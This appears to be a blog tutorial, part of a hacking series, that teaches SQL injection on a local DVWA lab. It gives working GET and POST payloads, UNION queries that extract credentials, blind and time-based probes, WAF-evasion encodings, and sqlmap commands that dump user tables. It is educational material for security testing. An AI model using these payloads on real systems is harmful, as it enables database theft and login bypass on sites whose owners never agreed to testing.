SQL injection attack on vulnerable website

Day 4: SQL Injection Testing

Extracting Data: SQL Injection with SQLMap & Manual Payloads

SQL injection (SQLi) is one of the most critical vulnerabilities in web applications, allowing attackers to manipulate database queries by injecting malicious input. Parrot OS, a Debian-based Linux distribution designed for cybersecurity, provides robust tools for testing and exploiting SQLi vulnerabilities. On Day 4 of this 7-day web application hacking series, we focus on mastering SQL injection techniques. This article covers understanding GET and POST SQL injection, testing with sqlmap and Damn Vulnerable Web Application (DVWA), performing manual injection with payloads like ' OR '1'='1 --, and bypassing filters and Web Application Firewalls (WAFs). All commands use example.com as the illustrative target, but testing must be conducted on your local lab (e.g., DVWA or OWASP Juice Shop from Day 1) to ensure ethical practices. Both graphical user interface (GUI) and command-line interface (CLI) methods are included, with additional techniques like error-based and blind SQLi to provide comprehensive coverage. By mastering these techniques, you will be equipped to identify and exploit SQLi vulnerabilities ethically and effectively.

Verifying the Test Lab

Ensure your test lab from Day 1 (DVWA and OWASP Juice Shop) is operational before proceeding with SQL injection testing.

  1. Check LAMP Stack: 
    sudo systemctl status apache2
sudo systemctl status mysql
    Verify that Apache and MySQL are running.
  2. Access DVWA: Navigate to http://localhost/dvwa, log in with admin/password, and set the security level to “Low” for easier testing.
  3. Access Juice Shop: Navigate to http://localhost:3000 to confirm OWASP Juice Shop is running.

Ethical Note: All commands use example.com for illustrative purposes. Only test on systems you own or have explicit permission to assess, such as your local lab. Unauthorized testing of live systems like example.com is illegal and unethical.

Task: Verify that DVWA is accessible and set to “Low” security level, and confirm OWASP Juice Shop is operational.

Outcome: Your test lab is ready for SQL injection testing.

Understanding GET and POST SQL Injection

SQL injection occurs when an application fails to sanitize user input, allowing malicious SQL queries to be executed against the database. SQLi can lead to data theft, authentication bypass, or database manipulation.

GET SQL Injection

GET-based SQLi occurs in URL parameters, where user input is passed directly to a database query.

  • Example: A URL like http://example.com/view.php?id=1 may query the database with SELECT * FROM users WHERE id = '1'.
  • Vulnerability: Injecting ' OR '1'='1 into the id parameter could modify the query to SELECT * FROM users WHERE id = '' OR '1'='1', returning all users.

POST SQL Injection

POST-based SQLi occurs in form submissions, where input fields (e.g., login forms) are processed without proper sanitization.

  • Example: A login form sending username=admin&password=pass may query SELECT * FROM users WHERE username = 'admin' AND password = 'pass'.
  • Vulnerability: Injecting admin' OR '1'='1' -- as the username could bypass authentication by altering the query.

Types of SQL Injection

  • Union-Based SQLi: Uses UNION to retrieve additional data (e.g., 1' UNION SELECT username, password FROM users --).
  • Error-Based SQLi: Exploits database error messages to extract information.
  • Blind SQLi: Infers data by observing application behavior (e.g., true/false responses).
  • Time-Based SQLi: Uses delays (e.g., SLEEP(5)) to confirm vulnerabilities.

Task: Review the SQL Injection module in DVWA and identify whether it uses GET or POST requests by inspecting the URL or form submission.

Outcome: You understand the mechanics of GET and POST SQL injection and various SQLi types.

Testing with sqlmap and DVWA

sqlmap is an automated tool for SQL injection testing, capable of detecting and exploiting vulnerabilities. We will use it with DVWA and illustrative commands for example.com.

sqlmap CLI Commands

  • Basic Scan (GET): 
    sqlmap -u "http://example.com/view.php?id=1" --batch
    Scans the URL for SQLi vulnerabilities in batch mode.
  • Enumerate Databases: 
    sqlmap -u "http://example.com/view.php?id=1" --dbs --batch
    Lists available databases.
  • Enumerate Tables: 
    sqlmap -u "http://example.com/view.php?id=1" -D example_db --tables --batch
    Lists tables in the example_db database.
  • Dump Table Data: 
    sqlmap -u "http://example.com/view.php?id=1" -D example_db -T users --dump --batch
    Dumps data from the users table.
  • POST Request Testing: 
    sqlmap -u "http://example.com/login.php" --data="username=admin&password=pass" --batch
    Tests a POST-based login form.
  • Error-Based SQLi: 
    sqlmap -u "http://example.com/view.php?id=1" --technique=E --batch
    Uses error-based techniques.
  • Blind SQLi: 
    sqlmap -u "http://example.com/view.php?id=1" --technique=B --batch
    Uses boolean-based blind SQLi.
  • Time-Based SQLi: 
    sqlmap -u "http://example.com/view.php?id=1" --technique=T --batch
    Uses time-based delays.
  • Cookie-Based Injection: 
    sqlmap -u "http://example.com/view.php" --cookie="session=abc123; security=low" --batch
    Tests injection via cookies (replace abc123 with a valid session ID).
  • Output to File: 
    sqlmap -u "http://example.com/view.php?id=1" --dump --output-dir=sqlmap_results --batch
    Saves results to the sqlmap_results directory.

sqlmap with DVWA (GUI and CLI)

  1. GUI (sqlmap with Burp Suite):
    • Configure Burp Suite (Day 3) to intercept DVWA’s SQL Injection module (http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit).
    • Copy the intercepted request to a file (e.g., request.txt).
    • Run sqlmap with the request file: 
      sqlmap -r request.txt --batch
  2. CLI (Direct Testing): 
    sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --batch
    Replace your_session_id with the session cookie from Firefox’s developer tools.
  3. Dump Users Table: 
    sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa -T users --dump --batch

Task: Use sqlmap to test DVWA’s SQL Injection module for GET-based SQLi and dump the users table. Run a scan on http://example.com/view.php?id=1 in your lab if applicable.

Outcome: You can automate SQL injection testing with sqlmap using both GUI and CLI methods.

Manual Injection Basics

Manual SQL injection involves crafting payloads to test vulnerabilities without automation, providing deeper insight into application behavior.

GET Injection Payloads

Test these payloads in a vulnerable GET parameter (e.g., http://example.com/view.php?id=1).

  • Basic Authentication Bypass: 
    http://example.com/view.php?id=1' OR '1'='1 --
    Returns all records by making the query always true.
  • Union-Based: 
    http://example.com/view.php?id=1' UNION SELECT 1, username, password FROM users --
    Retrieves usernames and passwords.
  • Error-Based: 
    http://example.com/view.php?id=1' AND 1=CONVERT(int, (SELECT @@version)) --
    Triggers a database error to extract version information.
  • Blind Boolean-Based: 
    http://example.com/view.php?id=1' AND (SELECT 1 FROM users WHERE username='admin')=1 --
    Infers data based on true/false responses.
  • Time-Based: 
    http://example.com/view.php?id=1' AND IF(1=1, SLEEP(5), 0) --
    Causes a delay if the condition is true.

POST Injection Payloads

Use Burp Suite or OWASP ZAP (Day 3) to intercept and modify POST requests.

  • Authentication Bypass: In a login form, set the username to: 
    admin' OR '1'='1' --
    And password to any value.
  • Union-Based: Modify a POST parameter (e.g., search): 
    search=test' UNION SELECT 1, username, password FROM users --
  • Blind Time-Based: Set a POST parameter to: 
    search=test' AND IF(1=1, SLEEP(5), 0) --

Testing with DVWA

  • GUI (Burp Suite/ZAP):
    • Intercept a request to http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit.
    • Modify the id parameter to 1' OR '1'='1 -- and forward the request.
    • Observe if additional data (e.g., all users) is returned.
  • Manual Browser Testing: 
    http://localhost/dvwa/vulnerabilities/sqli/?id=1' OR '1'='1 --&Submit=Submit
    Enter in the browser and check the response.

Task: Test DVWA’s SQL Injection module with manual GET and POST payloads, including ' OR '1'='1 -- and a union-based payload.

Outcome: You can manually craft and test SQL injection payloads to understand application vulnerabilities.

Bypassing Filters and WAF Evasion Basics

Web applications and WAFs may filter SQLi payloads, requiring techniques to bypass restrictions.

Common Filters

  • Keyword Filtering: Blocks words like UNION, SELECT, or --.
  • Character Filtering: Removes quotes or special characters.
  • Input Length Limits: Restricts the length of input strings.

Bypassing Filters

  • Case Variation: 
    http://example.com/view.php?id=1' UnIoN SeLeCt 1, username, password FrOm users --
    Uses mixed case to bypass keyword filters.
  • Inline Comments: 
    http://example.com/view.php?id=1' U/**/NION S/**/ELECT 1, username, password FROM users --
    Inserts comments to break keyword detection.
  • Encoding: 
    http://example.com/view.php?id=1' %55%4E%49%4F%4E %53%45%4C%45%43%54 1, username, password FROM users --
    Uses URL encoding for UNION SELECT.
  • Double Encoding: 
    http://example.com/view.php?id=1' %2555%254E%2549%254F%254E %2553%2545%254C%2545%2543%2554 1, username, password FROM users --

WAF Evasion with sqlmap

  • Tamper Scripts: 
    sqlmap -u "http://example.com/view.php?id=1" --tamper=space2comment --batch
    Replaces spaces with comments (e.g., /**/).
  • Random User-Agent: 
    sqlmap -u "http://example.com/view.php?id=1" --random-agent --batch
    Uses a random User-Agent to evade detection.
  • Delay Between Requests: 
    sqlmap -u "http://example.com/view.php?id=1" --delay=2 --batch
    Adds a 2-second delay to mimic human traffic.
  • Proxy Usage: 
    sqlmap -u "http://example.com/view.php?id=1" --proxy=http://127.0.0.1:8080 --batch
    Routes traffic through a proxy (e.g., Burp Suite).

Task: Test DVWA’s SQL Injection module with a filter-bypassing payload (e.g., inline comments) and use sqlmap with a tamper script on http://example.com/view.php?id=1 in your lab.

Outcome: You can bypass basic filters and WAFs to test SQLi vulnerabilities.

Practical Exercise

  1. Verify your DVWA and OWASP Juice Shop lab setup.
  2. Use sqlmap to test http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit for SQLi and dump the users table.
  3. Test manual GET and POST payloads (e.g., ' OR '1'='1 --) on DVWA’s SQL Injection module.
  4. Attempt filter bypassing with case variation and inline comments on http://example.com/view.php?id=1 (in your lab).
  5. Use sqlmap with a tamper script and random User-Agent on http://example.com/view.php?id=1.

Conclusion

Day 4 of this 7-day web application hacking series has equipped you with the skills to test for SQL injection vulnerabilities using Parrot OS. By understanding GET and POST SQLi, leveraging sqlmap for automated testing, crafting manual payloads, and bypassing filters and WAFs, you can identify and exploit database vulnerabilities in a controlled environment. These techniques are critical for ethical hacking and vulnerability assessment. Continue practicing in your lab, and prepare for Day 5, where you will explore Cross-Site Scripting (XSS) and other client-side attacks.

Next Steps:

  • Experiment with additional sqlmap tamper scripts and manual payloads in DVWA.
  • Explore SQLi challenges in OWASP Juice Shop.
  • Engage with cybersecurity communities on platforms like X to share insights and learn best practices.
Avatar photo

I'm passionate about technology, coding. I've been interested in computers since I was a kid. My favorite programming languages are python and JavaScript

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *